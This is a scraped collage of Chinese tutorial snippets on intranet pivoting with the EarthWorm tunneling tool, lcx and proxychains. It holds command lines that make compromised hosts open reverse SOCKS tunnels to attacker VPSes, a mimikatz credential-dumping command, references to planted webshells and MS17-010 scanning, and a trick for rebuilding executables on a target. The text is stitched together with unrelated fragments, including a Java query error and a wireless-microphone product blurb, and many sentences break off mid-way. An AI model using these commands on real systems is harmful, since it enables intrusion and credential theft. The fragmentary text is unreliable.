工具: EW: https://github.com/idlefire/ew proxychains: https://github.com/rofl0r/proxychains-ng 小米随身wifi 192.168.31.20 kali ip:192.168.1.128 由于无法使用学校内网服务器,而自己只有一台笔记本以及几个虚拟机,同时又刚好有一个小米随身wifi,我就想着将笔记本与虚拟机分开成2个内网环境 =/etcmake && make installmake install-config 安装成功后,修改其配置为你的公网ip及端口 vi /etc/proxychains.conf 改为 第三步、EW 反向 socks5 代理 服务器端 chmod +x ew_for_linux64. /ew_for_linux64 -s rcsocks -l 1080 -e 1024 kali连接1080端口,正和proxychains配置中端口相对应,然后目标机器连接1024端口,服务器则是将1080
内网穿透之通过Earthworm(EW)进行隧道穿透 一. 通过Earthworm(EW)进行隧道穿透 在进行多层网段渗透时,我们经常会遇到各种代理隧道问题,仅靠使用端口转发无法完成,可以利用Socks协议建立隧道进行连接,Socks是代理服务可以说是lcx 2.一层反向代理 1)假设当Web服务器它允许访问外部网络的情况下,可以利用EW工具以反向代理的方式进行socks隧道穿透,在Web服务器使用EW工具执行ew_for_Win.exe -s rssocks 2)在攻击机上使用EW工具开启服务端监听,执行./ew_for_linux64 -s rcsocks -e 6666 -d 8888命令,监听本地6666端口,同时6666端口流量映射到8888端口。 2)在Web服务器使用EW工具,执行ew_for_Win.exe -s lcx_tran -l 7777 -f 192.168.52.12 -g 8888命令,使用Web服务器的7777端口连接FTP服务器的
在写测试方法的时候 ,发现 bookLambdaQueryWrapper.like(name != null, Book::getName , name); 这一句老是报错
一、前言 前面一次网进行了内网渗透,这里做个人小结,也方便其他小伙伴学习EW。这里仅记录后渗透中与EW相关的部分已提前在tomcat中留下冰蝎马。 ? 二、本文介绍 1.准备工作 2.EW是什么,可以做什么。 3.内网模拟(基础环境及网络拓扑) 4.EW代理实战 6.利用proxychains代理寻找MS17-010。 三、准备工作 1.模拟环境需要natapp.cn这类NAT穿透工具注册账号购买免费web映射套餐 2.EW内网穿透工具,https://github.com/idlefire/ew 3.一台Ubuntu 同类工具还有socat,就实战来看,EW操作较简单,SOCAT有时会发生段错误,而EW则比较稳定。 第一步,在VPS上将Github下回的 EW 项目解压并执行: .
提出问题:通过ew反向代理后利用proxychains打开了火狐,访问了内网web端口,然后登录处想抓包爆破应该怎么设置这个代理呢? 如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢? ? 一、实验环境 ? 二、实验工具 Earthworm:下载地址:http://rootkiter.com/EarthWorm/ ? 三、操作步骤 首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。 ? /ew_for_linux64 -s rcsocks -l 1080 -e 8880 该命令是将本地1080端口的流量走向本地8880端口 Win7靶机:ew.exe -s rssocks -d 172.17.60.226
(2)通过隧道id启动隧道。 ? (3)在公网上访问域名,即可访问到内网的网站。 ? 5、Earthworm 内网穿透 EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 项目地址: http://rootkiter.com/EarthWorm 使用方法: (1)正向 SOCKS v5 服务器,适用于目标网络边界存在公网IP且可任意开监听端口。 . /ew -s ssocksd -l 1080 (2)反弹SOCKS v5 服务器,适用于目标网络边界不存在公网 IP,需要通过反弹方式创建 socks 代理 a) 先在一台具有公网 ip 的主机A上运行以下命令 /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ .
EW(Earthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 下载地址:https://github.com/idlefire/ew 官方网站:http://rootkiter.com/EarthWorm/ EW的指令信息如下所示: -s 选择功能类型: 共包含 /ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999 在Host2上启动流量转发,将Host2的9999 端口与V3的8888端口绑定,建立socks5通道: . /ew -s rcsocks -l 1080 -e 8888 在Host1执行,将Hack的8888端口与V2的9999端口绑定,建立socks5通道: . /ew -s lcx_listen -l 9999 -e 7777 在目标机Host3执行,启动socks5服务,并反弹到Host2的7777端口: .
三、EarthWorm 工具介绍 工具介绍: EarthWorm(EW)是一款便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,可以在复杂的网络环境中实现网络穿透。 EW能够以正向、反向、多级级联等方式建立网络隧道。 EW工具包提供了多个可执行文件,以适用不同的操作系统。 EW的新版本为Termite。 一、基本拓扑: image.png 二、基本拓扑搭建 R1、R2、R3、FW3、FW5均为“百香果”内网沙场拓扑图设备,开启后,其中FW3需配置NAT端口,将内网10.10.13.110的80端口映射到 EW隧道通信建立 VPS:访问webshell并上传ew 工具 image.png 配置ew 反向代理监听: ew -s rcsocks -l 1008 -e 888 image.png webshell :ew -s rssocks -d 66.28.6.110 -e 888 image.png 2.
EW(Earthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 下载地址:https://github.com/idlefire/ew 官方网站:http://rootkiter.com/EarthWorm/ EW的指令信息如下所示: -s 选择功能类型: 共包含 /ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999 在Host2上启动流量转发,将Host2的9999 端口与V3的8888端口绑定,建立socks5通道: . /ew -s rcsocks -l 1080 -e 8888 在Host1执行,将Hack的8888端口与V2的9999端口绑定,建立socks5通道: . /ew -s lcx_listen -l 9999 -e 7777 在目标机Host3执行,启动socks5服务,并反弹到Host2的7777端口: .
0x02 实战场景 实战环境模拟真实复杂的网络环境,包括ew的多级级联场景和内网服务器限制主动出网场景。 一、EarthWorm 一级级联和二级级联场景 1. 拓扑变更 image.png 2. 任务配置 1> 先配置1级级联 VPS配置:ew -s rcsocks -l 1008 -e 888 image.png A -> webshell:ew -s rssocks -d 66.28.6.110 配置FinalShell 的SSH连接和代理: image.png image.png 配置代理服务器: image.png image.png image.png image.png 2> 配置2级级联 通过Goby的网段探测,并未发现10.10.16.111这个网络: image.png 但是查看10.10.16.110的arp 却发现了这个存活地址,说明10.10.16.110的网络边界比 拓扑变更 image.png 2. 网络说明 A 映射80 端口到FW3的80。 A对外NAT限制访问。 A能访问B但是不能访问C,而B能访问到C。 但是B和C都不能出网访问Z。
EarthWorm 下载链接:https://github.com/rootkiter/EarthWorm https://codeload.github.com/idlefire/ew/zip/master EarthWorm能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。 EarthWorm EW有六种命令格式,分别是ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran。 配置proxychains: 打开内网Windows server 8的远程桌面: proxychains4 rdesktop 192.168.52.138 (2)反弹 SOCKS 5 服务器 正向 SOCKS 我们先将ew上传至B主机上面,并用ssocksd方式启动1234端口的正向socks代理: ew_for_Win.exe -s ssocksd -l 1234 接着,将ew上传至A主机中,并执行命令:
官网:http://rootkiter.com/EarthWorm/ github:https://github.com/rootkiter/Binary-files 下载:https://github.com /ew -s ssocksd -l 1080 (2)反弹 SOCKS v5 服务器 先在一台具有公网 ip 的主机A上运行以下命令: $ . /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ . /ew -s rssocks -d 127.0.0.1 -e 7777 2、Termite 官网:http://rootkiter.com/Termite/ github:https://github.com /README.txt EarthWorm的升级版,已经永久停止更新 3、reGeorg github:https://github.com/sensepost/reGeorg SOCKS over HTTP
内网转发工具的使用 目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道) EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理 (EarthWorm)结合proxychains代理链 EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 不管是linux还是windows系统,Earthworm的包都是一个,如图上面。直接进入包里面,选择对应的程序即可执行 EW正向代理 Web服务器的设置 如果是Linux系统 . /lcx -m 2 -p1 22222 -h2 127.0.0.1 -p2 2222 #将本地2222端口的流量给本地的22222端口 我们连接VPS的2222端口,就相当于连接了内网主机的22端口 /lcx -m 2 -p1 23389 -h2 127.0.0.1 -p2 13389 #监听本地23389的流量转发给本地的13389端口,正向代理 在内网Windows服务器上的操作 lcx.exe
EW-DP系列EW-DP系列除了可堆叠的EW-DP EK接收器外,该系列还包括一个配领夹麦克风的腰包式发射机(EW-D SK)、一个手持式发射机(EW-D SKM-S)和一个即将于10月推出的直插式发射机 (EW-DP SKP)。 当前上市的套装共有三款,包括:EW-DP ME 2 套装,配有一个腰包式发射机和ME 2全指向形夹式(领夹式)麦克风;EW-DP ME 4套装,配有一个心形指向夹式麦克风,适用于噪音较大的环境;以及EW-DP 最后,EW-DP诞生了,我愿称之为极简UHF系统。”值得一提的是,EW-DP是首款具有磁性堆叠接收机的便携式无线系统,该接收机配有朝向用户的OLED显示屏和符合人体工学的操控设计。 直插式发射机将是EW-DP ENG套装的一部分,该套装包括接收机、一个腰包式发射机、ME 2领夹式麦克风和SKP直插式发射机。(Ends)产品及系统的高精度图片可由此下载。应用及情景图片可由此下载。
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。 /ew -s ssocksd -l 1080 2. 反弹 SOCKS v5 服务器 这个操作具体分两步:a) 先在一台具有公网 ip 的主机A上运行以下命令: $ . /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ . /ew -s ssocksd -l 9999 $ . /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ .
、reGeorg reGeorg+Proxifier reGeorg+proxychains 类似工具 2、EarthWorm 正向代理 反向代理 Part.1 Lcx 本地端口转发 有如下图所示测试环境 /lcx -m l -p1 8888 -h2 192.168.3.140 -p2 3389 ? 尝试连接linux的8888端口: ? 成功连接至window的3389端口: ? 正向代理 EW 是一套便携式的网络穿透工具,既支持SOCKS5代理转发,又支持静态端口转发。 将EW对应的执行程序上传至外网服务器: ? 外网服务器开启代理: ew.exe -s ssocksd -l 8889 ? 可以直接在浏览器中开启代理: ? //这里使用的是FoxyProxy插件。 首先在攻击机上开启监听: ew.exe -s rcsocks -l 1080 -e 8880 ?
对于以上三种情况,lcx可以突破1和2二种,但是第3种就没有办法了,因为lcx在使用中需要访问外部网络。 这里的第3种就可以用到我们今天重点要讲的SOCKS代理。 2、在VPS上执行 lcx.exe –listen 9000 5555 此段命令意思是将本机9000端口上监听到的所有数据转发到本机的5555端口上。 1.Earthworm 网址:https://github.com/rootkiter/EarthWorm EW 是一套便携式的网络穿透工具,具有 2.反弹socks v5服务器 适用于目标机器没有公网IP,但可访问内网资源 A.先上传ew 到左侧ip地址为139.XXX.XX.113公网VPS的C盘上,运行下列命令: ew -s rcsocks 3.二级网络环境(一) 假设我们获得了右侧A主机和B主机的控制权限,A主机配有2块网卡,一块连通外网,一块10.48.128.25只能连接内网B主机,无法访问内网其它资源。
start=SGKGCABCRS 【需科学上网后才可正常访问】 2.通过翻看邮件内容发现边缘资产并通过反序列化漏洞拿到webshell image.png Weblogic的路径一般可以通过类似路径查找 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt image.png 内网转发 利用Proxifier+EarthWorm /ew -s rcsocks -l 1080 -e 8888 // 在 1.1.1.1 的公网主机添加转接隧道,将 1080 收到的代理请求转交给反连 8888 端口的主机 b) . /ew -s rssocks -d 1.1.1.1 -e 8888 // 将目标网络的可控边界主机反向连接公网主机 c) HackTools 可通过访问 1.1.1.1:1080 端口使用 tools/netsess/index.htm psloggedon下载地址:http://technet.microsoft.com/en-us/sysinternals/bb897545.aspx 这2个工具主要是查看是否在线和在哪登陆过
的一些模块就好了: python ‐m pip install pycrypto python ‐m pip install pycryptodome python ‐m pip install httplib2 ---- earthworm正向跨平台socks代理 反向代理 一、客户端攻击机吧外网的888端口转发到本地的1008端口: . /ew_for_linux64 -s rcsocks -l 1008 -e 888 ? 二、目标边界接收888端口的数据: ew_for_Win.exe -s rssocks -d 192.168.2.13 -e 888 ? ? ---- earthworm正向跨平台socks代理 下载地址:https://github.com/L-codes/Neo-reGeorg 一、生成webshell,密码是123456: python
其中,PPTP和L2TP工作在数据链路层,IPSec工作在网络层,SOCKS v5工作在会话层。 e.g. EarthWorm(ew、新版本Termite)、reGeorg、sSocks、SocksCap64(SSTap)、Proxifier、ProxyChains 六、压缩数据 1、rar.exe 将E:\ 2、Debug上传 先将需要上传的EXE文件转换为十六进制HEX的形式,再通过echo命令将HEX代码写入文件,最后利用Debug功能将HEX代码编译并还原成EXE文件 在KaliLlnux中,exe2bat.exe 工具位于/usr/share/windows-binaries目录,执行 wine exe2bat.exe ew.exe ew.txt 将ew.exe转换为ew.txt 然后,利用目标服务器的Debug 功能将HEX代码还原为EXE文件 再使用echo命令将ew.txt里面的代码复制到目标系统的命令行环境中 3、其他 还可以用以下这些上传文件: Nishang:利用Nishang将上传的EXE文件转换为十六进制的形式